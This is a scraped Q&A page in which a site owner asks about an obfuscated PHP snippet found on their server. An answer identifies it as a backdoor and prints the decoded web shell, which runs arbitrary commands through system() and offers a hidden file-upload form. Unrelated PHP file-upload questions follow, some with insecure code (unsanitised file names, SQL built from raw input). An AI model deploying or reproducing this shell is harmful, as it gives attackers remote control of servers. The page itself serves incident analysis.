A suspected code uploaded in my website - php

Could someone explain me what is the effect of this snippet :
eval(gzinflate(str_rot13(base64_decode('DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1+e/L0WSNzzHza5rSI+8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ+FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc/HRO9oVHY9iTSnq58/F+HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD+oiOz7MetE3w/litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X+Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P+svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU/B2XAXsnqPgJjIheHq8REYvu+L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4/ufX37evz/8='))));


Your server has been hacked. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server for recovery tips. This code allows an attacker to upload any file they want to your server. It decodes to:
<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
$file = $_FILES["myFile"]["tmp_name"];
$name = $_FILES["myFile"]["name"];
if (!move_uploaded_file($file, $name)) {
echo "Unable to upload file";
} else {
echo "File Uploaded...";
}
}
}
if (!empty($_GET["x"])) {
echo "<pre>";
system($_GET["x"]);
echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
exit;
}
?>

Related

How to upload the audio file using php

i wanted to upload the mp3 file to the related folder name /uploads/ inside my project folder. But something not working correctly in php. Image file are uploading without any error but when i tried to upload the mp3 file its not working.
Here is my html form
<form action="act_songs.php" method="post" enctype="multipart/form-data">
<?php
if (isset($_SESSION['msg'])) {
echo $_SESSION['msg'];
unset($_SESSION['msg']);
}
?>
<p>
<label>Song Title</label>
<input type="text" name="sng-title">
</p>
<p>
<label>Song Name</label>
<input type="file" name="mp3" accept="audio/*" runat="server">
</p>
<p>
<input type="submit" name="add-song" value="ADD">
</p>
</form>
And here is my php code
if (isset($_POST['add-song'])) {
$title = $_POST['sng-title'];
$audio = $_FILES['mp3']['name'];
$audio_type = $_FILES['mp3']['type'];
$audio_size = $_FILES['mp3']['size'];
$tmp_location = $_FILES['mp3']['tmp_name'];
$audio_url = "../uploads/".$audio;
if ($type == '.mp3' || $type == '.wav') {
if ($size <= 5000) {
move_uploaded_file($tmp_location, $audio_url);
}
}
if (!empty($title)) {
$sql = "insert into `tbl_songs` (`title`,`songs`) values ('$title','$audio_url')";
$sql_run = mysql_query($sql);
if ($sql_run) {
$_SESSION['msg'] = "<div class='alert'>Record Saved</div>";
header('location:songs.php');
}
else{
$_SESSION['msg'] = "<div class='alert'>Record Cannot Saved</div>";
header('location:add-songs.php?invalid');
}
}
else{
$_SESSION['msg'] = "<div class='alert'>Title Must be requiired.</div>";
header('location:add-songs.php?invalid');
}
}
What is the problem i am unable to debug the problem. If anybody have solution then place your answer

Uploading files in php (doing nothing)

<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_POST)
{
if(count($_FILES)>=0)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
}
?>
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>
I want to upload some files. Probably the simplest idea but it doesn't work and I don't know why. Any suggestions why when I press Upload the file just disappears?

You problem is that you're checking the $_POST superglobal when you should in fact check only $_FILES superglobal:
<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_FILES)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>

PHP and html uploader

I have a problem with my code but it is not about and error.
1) when I hit to refresh I still see previously echoing variables.
2)when I choose a file, it is supposed to transfer from temp_name into the 'uploads/' but it doesn't + it doesn't throw 'uploaded' message.
3) when I don't choose a file and submit it, it should say 'please choose a file.
can you explain me HOW to solve my issues and WHY are these things happening?
<?php
if (isset($_POST['submit'])){
$size=$_FILES['file']['size'].'kb'."<br>";
$name=$_FILES['file']['name']."<br>";
$type=$_FILES['file']['type']."<br>";
$tmp_name=$_FILES['file']['tmp_name']."<br>";
if (isset($name))
{
if(!empty($name))
{
$location='uploads/';
if (move_uploaded_file($tmp_name,$location.$name))
{
echo 'UPLOADED';
}
echo 'OK.';
}else
{
echo 'please choose a file.';
}
}
}
?>
<form action="upload.php" method="POST" enctype="multipart/form-data">
<br>
<input type ="file" name="file">
<br> <br>
<input type="submit" name="submit" value ="Submit">
</form>
<?php
echo 'File size: '.$size;
echo 'File name: '.$name;
echo 'File type: '.$type;
//echo 'File temporary place: '.$tmp_name;
?>
PS: this is a screenshot from page after just hit the refresh button
I

Here you go, using the file error value. Values will be 0 to 8 for different issues: http://php.net/manual/en/features.file-upload.errors.php
if (isset($_POST['submit'])){
if ($_FILES["file"]["error"]==0){ //success so far
$size=$_FILES['file']['size'];
$name=$_FILES['file']['name'];
$type=$_FILES['file']['type'];
$tmp_name=$_FILES['file']['tmp_name'];
$location='uploads/';
try{
$result = move_uploaded_file($tmp_name,$location.$name); // this will throw warnings though!
if($result){
echo 'UPLOADED AND MOVED';
}else{
echo "Unable to move the file";
}
}catch(Exception $e){
echo "Sorry there was a problem ".$e.getMessage();
}
}else{ //some sort of problem
echo "There was a problem with the upload (error code: ".$_FILES["file"]["error"].")";
if($_FILES["file"]["error"]==4 ){ // UPLOAD_ERR_NO_FILE
echo "<br/> Please choose a file to upload";
}
}
}
Make sure that your uploads folder exists and the permissions are set correctly. Display the correct errors may help.

Multiple file upload herror

I found a nice tutorial on YouTube by Anthoniraj Amalanathan. On the video tutorial, it works fine for hem but when I try to replicate it, I get an error. Here is the code:
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true)
{
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++)
{
$name=$files['name'][$x];
$tmp_name = $file['tmp_name'][$x];
move_uploaded_file($files,'test/'.$name);
echo 'Upload OK';
}
}
?>
The message states that the error is on line 12 ($tmp_name = $file['tmp_name'][$x];) but I don't seem to figure out why.
Can some one help here?

Try this, I tested it and it works for me.
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true) {
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++) {
$name = $files['name'][$x];
$tmp_name = $file['tmp_name'][$x];
move_uploaded_file($files['tmp_name'][$x],'test/'.$name);
echo 'Upload OK';
}
}
?>
The error I got came from using an array as the temp. file location. By changing it to $files['tmp_name'][$x], it worked.
Old: move_uploaded_file($files,'test/'.$name);
New: move_uploaded_file($files['tmp_name'][$x],'test/'.$name);

Its just a typo. $file is never declared, it should be $files.
Here:
$tmp_name = $file['tmp_name'][$x];
// ^ missing s
Also here:
move_uploaded_file($files,'test/'.$name);
// ^^^^^^ shouldn't this be $tmp_name?

Try like this :
<?php
if(is_uploaded_file($_FILES['upload']['tmp_name'])){
foreach($_FILES['upload']['name'] as $x=>$name) {
$name = basename($_FILES['upload']['name'][$x});
$folder = 'test/';
$full_path = $folder.$name ;
if(move_uploaded_file($_FILES['upload']['tmp_name'][$x], $full_path)) {
echo 'Upload OK';
} else {
echo 'Upload Failed';
}
}
}else{
echo 'Upload Not Received';
}
?>

re-sizing image in php error in server

i have a code for re-sizing image in php... it works well in local machine and splitting correctly...images are visible in all 4 sizes... but,when am using this in server...image size is re-sized...original image is visible...resized image is not visible...comes with black color...what is the solution for it...here is the code i used...
main.php
<?php
if(isset($_POST['submit']))
{
$uploaddir = 'uploads/';
$file = basename($_FILES['uploadedfile']['name']);
$uploadfile = $uploaddir . $file;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $uploadfile);
include ("thumb.php");
$target=$_FILES['uploadedfile']['name'];
$new='uploads/'."thumb_".$target;
$type=$_FILES['uploadedfile']['type'];
$w=90;
$h=90;
resize($target,$new,$w,$h,$type);
include ("medium.php");
$new1='uploads/'."middle_".$target;
$type1=$_FILES['uploadedfile']['type'];
$w1=400;
$h1=400;
resizee($target,$new1,$w1,$h1,$type1);
include ("big.php");
$new2='uploads/'."big_".$target;
$type2=$_FILES['uploadedfile']['type'];
$w2=900;
$h2=900;
resizeee($target,$new2,$w2,$h2,$type2);
echo "thumb_".$target."<br>";
echo "middle_".$target."<br>";
echo "big_".$target."<br>";
}
?>
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="uploadedfile">
<input type="submit" name="submit">
</form>
</body>
</html>
thumb.php
<?php
function resize($target,$new,$w,$h,$type)
{
echo $target;
list($wo,$ho)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m=imagecreatefrompng('uploads/'.$target);
}
$change=imagecreatetruecolor($w,$h);
imagecopyresampled($change,$m,0,0,0,0,$w,$h,$wo,$ho);
imagejpeg($change,$new,90);
}
?>
medium.php
<?php
function resizee($target,$new1,$w1,$h1,$type)
{
list($wo1,$ho1)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m1=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m1=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m1=imagecreatefrompng('uploads/'.$target);
}
$change1=imagecreatetruecolor($w1,$h1);
imagecopyresampled($change1,$m1,0,0,0,0,$w1,$h1,$wo1,$ho1);
imagejpeg($change1,$new1,500);
}
?>
big.php
<?php
function resizeee($target,$new2,$w2,$h2,$type)
{
list($wo2,$ho2)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m2=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m2=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m2=imagecreatefrompng('uploads/'.$target);
}
$change2=imagecreatetruecolor($w2,$h2);
imagecopyresampled($change2,$m2,0,0,0,0,$w2,$h2,$wo2,$ho2);
imagejpeg($change2,$new2,900);
}
?>

You may want to check the permissions on the file / directory to make sure that they are readable and writable by your PHP script.

Categories